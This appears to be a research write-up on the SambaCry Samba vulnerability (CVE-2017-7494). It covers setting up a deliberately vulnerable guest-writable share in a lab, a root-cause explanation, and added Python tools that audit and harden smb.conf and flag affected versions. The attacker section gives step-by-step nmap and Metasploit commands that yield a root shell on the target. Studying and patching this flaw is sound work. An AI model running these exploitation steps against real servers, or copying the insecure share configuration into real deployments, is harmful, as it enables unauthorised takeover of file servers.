SambaCry RCE Exploit | Lucideus Research
Introduction
Samba releases from 3.5.0 onward, including 4.0 through 4.4.13, 4.5.0 through 4.5.9 and 4.6.0 through 4.6.3, carry a remote code execution flaw nicknamed SambaCry and tracked as CVE-2017-7494; it was fixed in 4.4.14, 4.5.10 and 4.6.4. A client that can write to a share (an authenticated user, or a guest where the share allows it) can upload a shared library and then make smbd load it, taking control of the server that hosts the vulnerable Samba service.
The official description reads: Samba 3.x after 3.5.0 and 4.x before 4.4.14, 4.5.x before 4.5.10, and 4.6.x before 4.6.4 does not restrict the file path when using Windows named pipes, which allows remote authenticated users to upload a shared library to a writable shared folder, and execute arbitrary code via a crafted named pipe.
Setup Server on Kali Linux 2.0 (2015)
Steps for Server Configuration:
- Check Samba Version
smbd -V
- Locate Samba Configuration File
locate smb.conf
- Create a SMB Share directory
mkdir /root/smbshare
- Give full permission to the folder created above
chmod 777 /root/smbshare
(Note: on Debian-based systems, Kali included, /root is mode 0700, so the guest account (nobody) cannot traverse into /root/smbshare even though the directory itself is 0777. If the share turns out not to be reachable as a guest, create it outside /root, for example /srv/smbshare, and use that path in the share definition.)
- Edit smb.conf to create a network share
nano /PATH/smb.conf
- Add these lines at the bottom to create SMB Share
nt pipe support = yes
[smbshare]
comment = SMB_SHARE
path = /root/smbshare
browseable = yes
writable = yes
guest ok = yes
(Note: nt pipe support is a global parameter and belongs under [global]; appended at the bottom of the file it lands in whichever share section happens to come last. Its default is already yes, so the line only makes the vulnerable default explicit. nt pipe support = no under [global] is the vendor workaround for this CVE and is the line to add on a production server, not on this lab one.)
- Save smb.conf
- Start or Restart SMBD/NMBD Service
service smbd start
service nmbd start
service smbd restart
- Check SMBD Service Status
service smbd status
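The lab configuration above is what a vulnerable server looks like; the following is an added example (not code from the original post or from the Samba project) that checks an smb.conf for the conditions the exploit needs, a writable share plus named-pipe support, and emits a copy with the vendor workaround applied. The sample configuration embedded in it is constructed to mirror the steps above, with a made-up [docs] share standing in for whatever section happens to be last in the file, and the parser is a simplified reading of smb.conf syntax, not Samba's own loader.

```python
"""Check an smb.conf for the CVE-2017-7494 preconditions and emit a hardened copy (added example)."""
import re

# Constructed sample: the lab share appended "at the bottom", after an assumed [docs] share.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   map to guest = Bad User

[docs]
   path = /srv/docs
   read only = yes

nt pipe support = yes
[smbshare]
comment = SMB_SHARE
path = /root/smbshare
browseable = yes
writable = yes
guest ok = yes
"""

HARDENED_LINE = "   nt pipe support = no"   # the vendor workaround for CVE-2017-7494


def samba_bool(value):
    return value.strip().lower() in {"yes", "true", "1"}


def parse_smb_conf(text):
    """Return {section: {key: value}} in file order; keys lowercased with spaces collapsed."""
    sections, current = {}, "global"   # lines before the first header are treated as [global] here
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        header = re.match(r"^\[(.+)\]$", line)
        if header:
            current = header.group(1).strip().lower()
            sections.setdefault(current, {})
            continue
        if "=" in line:
            key, _, value = line.partition("=")
            sections.setdefault(current, {})[" ".join(key.split()).lower()] = value.strip()
    return sections


def last_setting(share, true_keys, inverted_keys, default):
    """Resolve a boolean option with synonyms the way Samba does: the last occurrence wins."""
    result = default
    for key, value in share.items():
        if key in true_keys:
            result = samba_bool(value)
        elif key in inverted_keys:          # e.g. "read only = no" means writable
            result = not samba_bool(value)
    return result


def assess(text):
    conf = parse_smb_conf(text)
    pipes = samba_bool(conf.get("global", {}).get("nt pipe support", "yes"))   # default is yes
    misplaced = [name for name, kv in conf.items() if name != "global" and "nt pipe support" in kv]
    writable = []
    for name, kv in conf.items():
        if name == "global":
            continue
        if last_setting(kv, ("writable", "writeable", "write ok"), ("read only",), False):
            writable.append({"share": name, "path": kv.get("path"),
                             "guest": last_setting(kv, ("guest ok", "public"), (), False)})
    return {"nt_pipe_support": pipes, "misplaced_nt_pipe_support": misplaced,
            "writable_shares": writable, "exploitable": pipes and bool(writable)}


def harden(text):
    """Drop every nt pipe support line and set nt pipe support = no exactly once, under [global]."""
    out, section, placed = [], None, False
    for raw in text.splitlines():
        line = raw.strip()
        header = re.match(r"^\[(.+)\]$", line)
        if header:
            if section == "global" and not placed:   # leaving [global]: put the workaround in first
                out.append(HARDENED_LINE)
                placed = True
            section = header.group(1).strip().lower()
            out.append(raw)
            continue
        key = " ".join(line.partition("=")[0].split()).lower() if "=" in line else ""
        if key == "nt pipe support":
            if section == "global" and not placed:
                out.append(HARDENED_LINE)
                placed = True
            continue                                  # the original line is dropped wherever it was
        out.append(raw)
    if not placed:
        if section == "global":                       # [global] was the last section in the file
            out.append(HARDENED_LINE)
        else:                                         # no [global] section at all
            out[0:0] = ["[global]", HARDENED_LINE]
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    print(assess(SAMPLE_SMB_CONF))
    print(harden(SAMPLE_SMB_CONF))
```

Running it against the sample reports that nt pipe support is effectively on (the appended line sits in [docs], so the [global] default of yes applies), that smbshare is writable by guests, and that the hardened copy no longer meets the exploit's preconditions. The same check run over a real smb.conf (or over `testparm -s` output, which resolves synonyms and defaults for you) is a quick way to triage a fleet for this CVE.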
On Attacking Machine
- Run nmap scan on victim IP
nmap -sS -sV -sC IP
(Samba listens on TCP 139 and 445.)
- Check if victim is using vulnerable version of Samba
-sV on its own often reports only "Samba smbd 3.X - 4.X"; the exact release usually appears in the smb-os-discovery script output enabled by -sC, for example "Samba 4.5.9-Debian". Compare it against the affected ranges: 3.5.0 and later 3.x, 4.0 to 4.4.13, 4.5.0 to 4.5.9, 4.6.0 to 4.6.3.
- Start Metasploit-Framework
msfconsole
- Use is_known_pipename module
use exploit/linux/samba/is_known_pipename
- Set RHOST victim_IP
set RHOST victim_IP
(The module needs a share it can write to and that share's path on the server's filesystem. By default it logs in anonymously, enumerates the shares and tries to work out the path itself; the share and directory can be set explicitly with SMB_SHARE_NAME and SMB_FOLDER, and credentials with SMBUser and SMBPass.)
- Exploit
exploit
- Exploit is successful and we get an interactive shell, running with the privileges of the smbd worker process, which is normally root.
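Deciding from the scan whether the target is in an affected range is the step most often done by eye. The following is an added example (not part of the original post) that pulls the Samba release out of nmap output and tests it against the CVE-2017-7494 ranges quoted above. The nmap output embedded in it is constructed to look like what -sV -sC prints for the lab server; the host name and timestamp are made up.

```python
"""Extract the Samba version from nmap output and check it against CVE-2017-7494 (added example)."""
import re

# Constructed nmap output: -sV gives only a range on the service lines, the exact
# release comes from the smb-os-discovery script that -sC runs.
NMAP_OUTPUT = """\
PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

Host script results:
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.5.9-Debian)
|   Computer name: kali
|   NetBIOS computer name: KALI\\x00
|   Workgroup: WORKGROUP\\x00
|_  System time: 2017-05-30T10:12:44+00:00
"""

FIRST_AFFECTED = (3, 5, 0)
# First fixed release on each branch that received a fix; 3.x and 4.0 to 4.3 never got one.
FIXED_IN = {(4, 4): (4, 4, 14), (4, 5): (4, 5, 10), (4, 6): (4, 6, 4)}

VERSION_RE = re.compile(r"Samba(?: smbd)? (\d+)\.(\d+)\.(\d+)")


def parse_version(text):
    """Return (major, minor, patch) for a string like '4.5.9-Debian', or None."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", text.strip())
    return tuple(int(x) for x in m.groups()) if m else None


def version_from_nmap(output):
    """First exact Samba version in the output; '3.X - 4.X' style ranges do not match."""
    m = VERSION_RE.search(output)
    return tuple(int(x) for x in m.groups()) if m else None


def is_vulnerable(version):
    major, minor, _ = version
    if version < FIRST_AFFECTED:
        return False
    if major == 3:
        return True                 # 3.5.0 onward: end-of-life branch, no fixed release
    if major == 4:
        if minor < 4:
            return True             # 4.0 to 4.3 never received the fix
        fixed = FIXED_IN.get((major, minor))
        return fixed is not None and version < fixed   # 4.7+ shipped after the fix
    return False


def assess_scan(output):
    version = version_from_nmap(output)
    return {"version": version,
            "vulnerable": None if version is None else is_vulnerable(version)}


if __name__ == "__main__":
    print(assess_scan(NMAP_OUTPUT))
```

A banner match is only a version check: it does not tell you whether a writable share exists or whether nt pipe support has been turned off, so treat a "vulnerable" result as a lead for the exploit step, not as proof.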
Vulnerability
The flaw is CVE-2017-7494, described in the introduction: affected servers do not restrict the file path when a client opens a Windows named pipe. Three things have to hold for it to be exploitable: the attacker can write a file to a share (as an authenticated user, or as a guest where the share allows it), the attacker knows or can discover that share's path on the server's filesystem, and named-pipe support is enabled (nt pipe support = yes, which is the default). If the share lives on a filesystem mounted noexec, the library cannot be mapped executable and the load fails. The sections below explain the pieces involved.
InterProcess Communication
Interprocess communication (IPC) refers to the mechanisms an operating system provides so that separate processes can exchange data and coordinate. IPC is commonly used in a client/server arrangement, where the client sends a request and the server acts on it and replies.
Named Pipes
A named pipe is an extension to the traditional pipe concept on Unix and Unix-like systems, and is one of the methods of Interprocess Communication (IPC). The concept is also found in Microsoft Windows. A traditional pipe is "unnamed" and lasts only as long as the process. A named pipe, however, can last as long as the system is up, beyond the life of the process.
SMBD
SMBD is the server daemon that provides file sharing and printing services to Windows clients. The server provides filespace and printer services to clients using the SMB (or CIFS) protocol.
Microsoft Remote Procedure Call
Microsoft Remote Procedure Call (RPC) is a powerful technology for creating distributed client/server programs. RPC is an interprocess communication technique that allows client and server software to communicate.
Named pipes are reachable over the network through SMB: a client opens a pipe as a file on the special IPC$ share, and MSRPC requests then travel over that pipe. When a client opens a pipe, Samba validates the requested name with the internal function is_known_pipename(). If the name is not in the built-in table of pipes that smbd serves itself, the function calls smb_probe_module() to try to load an RPC module of that name from Samba's module directory, which is how additional RPC services can be supplied as plugins.
A pipe can also be handed to an external RPC daemon with the rpc_server option in smb.conf (for example rpc_server:spoolss = external), in which case smbd forwards the requests instead of serving them in-process.
The problem is that is_known_pipename() never checked that the name was a bare pipe name. A name containing '/' was accepted, and smb_probe_module() treats a name that starts with '/' as an absolute path to a shared object, so the server calls dlopen() on whatever file the client named. An attacker who has uploaded a library to a writable share therefore opens a "pipe" whose name is that library's full server-side path (for example /root/smbshare/evil.so), and smbd loads it; any ELF constructor in the library, and the samba_init_module() entry point that Samba calls on a freshly loaded module, then run inside the smbd process. The fix in 4.4.14, 4.5.10 and 4.6.4 rejects any pipe name containing '/'; on unpatched servers, nt pipe support = no in [global] disables the code path as a workaround.
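The following is an added example, not Samba's code or the exploit module's, that models the server-side logic just described so the vulnerable and fixed behaviour can be compared side by side: how a pipe name is resolved to a module path, what the pre-fix is_known_pipename() does with a name that is really a filesystem path, and what the one-line fix changes. The built-in pipe table is a constructed subset, and MODULES_DIR is an assumed location; the real code computes the module directory from the subsystem name and platform library suffix.

```python
"""Model of the pipe-name check behind CVE-2017-7494 (added example, not Samba source)."""
import posixpath

# Constructed subset of the pipes smbd serves in-process (Samba's rpc_lookup table is longer).
BUILTIN_PIPES = {"srvsvc", "samr", "lsarpc", "netlogon", "winreg", "wkssvc",
                 "spoolss", "ntsvcs", "epmapper"}
# Assumed module directory; the real path is computed from the subsystem name and shlib_ext().
MODULES_DIR = "/usr/lib/x86_64-linux-gnu/samba/rpc"


def smb_probe_module_path(subsystem, module):
    """Path that smb_probe_module(subsystem, module) would hand to dlopen().

    Modelled on Samba's behaviour: a name beginning with '/' is used verbatim as an
    absolute path; anything else is looked up as <modules dir>/<name>.so.
    """
    if module.startswith("/"):
        return module
    return f"{MODULES_DIR}/{module}.so"


def is_known_pipename(pipename, patched):
    """Return (outcome, path): outcome is 'builtin', 'load' (dlopen of path) or 'rejected'.

    The unpatched version never rejects: an unknown name always reaches the module loader.
    """
    if patched and "/" in pipename:
        return ("rejected", None)          # the CVE-2017-7494 fix: no path separators in pipe names
    if pipename in BUILTIN_PIPES:
        return ("builtin", None)           # served by smbd itself, nothing is loaded
    # Unknown name: Samba probes for a plugin, which dlopen()s the resolved path.
    return ("load", smb_probe_module_path("rpc", pipename))


def craft_pipename(share_path, uploaded_file):
    """What the attacker opens as a 'pipe' on IPC$: the uploaded library's full server-side path."""
    return posixpath.join(share_path, uploaded_file)


def simulate_open(pipename, patched):
    """One-line summary of what the server would do for a pipe open request."""
    outcome, path = is_known_pipename(pipename, patched)
    if outcome == "load":
        return f"dlopen({path}): constructors and samba_init_module() run inside smbd"
    return f"{outcome}: {pipename}"


if __name__ == "__main__":
    evil = craft_pipename("/root/smbshare", "evil.so")
    for name in ("srvsvc", "mysvc", evil):
        print(f"unpatched  {simulate_open(name, patched=False)}")
        print(f"patched    {simulate_open(name, patched=True)}")
```

The model makes the two halves of the bug visible: the validation function accepts anything, and the loader it falls through to trusts a leading '/'. Either half alone would have been harmless; the fix closes the first, and a noexec mount on the share or nt pipe support = no closes the path at the second.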